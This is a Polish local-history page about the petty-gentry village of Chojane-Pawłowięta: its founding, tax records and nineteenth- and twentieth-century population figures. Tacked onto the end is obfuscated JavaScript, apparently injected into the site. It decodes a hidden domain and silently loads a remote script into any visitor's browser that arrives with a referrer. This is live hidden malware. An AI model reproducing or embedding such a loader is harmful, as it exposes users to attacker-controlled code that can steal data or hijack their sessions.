Chojane- Pawłowięta

Chojane tworzyło tak zwaną okolicę szlachecką, dzieliło się ono na dwie części: północną tworzyły Bąki, Gorczany i Piecki, natomiast południową Stankowięta, Sierocięta i właśnie Pawłowięta.Wszystko wskazuje na to, że część południowa jest młodsza od północnej. Chojane Pawłowięta notowane jest, podobnie jak Gorczany, dopiero od 1580 roku. W ówczesnym spisie podatkowym zapisano istnienie miejscowości zwanej Choiany Pawłowięta, dziedziczyli tutaj Mikołaj, syn Adama oraz Jan, syn Wawrzyńca (w jego imieniu podatek płacił Stanisław Chojeński). W sumie było tu 7 włók szlacheckich. Nazwa wsi pochodzi od imienia Paweł. To właśnie Paweł Chojeński był pierwszym osadnikiem w tej wsi. Zapewne był to ów Paweł Chojeński notowany w 1528 roku we wsi Chojane Bąki – najzamożniejszy ówcześnie rycerz w tej okolicy, zapewne posiadał tu dział ziemi i on, lub jego potomkowie, osiedlili się tutaj dając początek tej nowej wsi. Nazwa miejscowości przez wieki pisana była tak samo jak obecnie. Notowana jest w czasie spisu podatku pogłównego z 1676 roku oraz na mapach podlaskich z końca XVIII wieku. Mieszkała tu drobna szlachta, z tym że było to jedno z większych osiedli w okolicy. W 1827 roku naliczono tutaj 19 domów i 105 mieszkańców. Miejscowość należała od 1867 roku do gminy Chojane i parafii Kulesze. W końcu XIX wieku istniało tu 20 gospodarstw drobnoszlacheckich na 215 ha ziemi, średnie gospodarstwo miało obszar ponad 10 ha. W czasie spisu powszechnego z 1921 roku we wsi naliczono 19 domów i 107 mieszkańców, dwóch z nich podało wiarę prawosławną.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);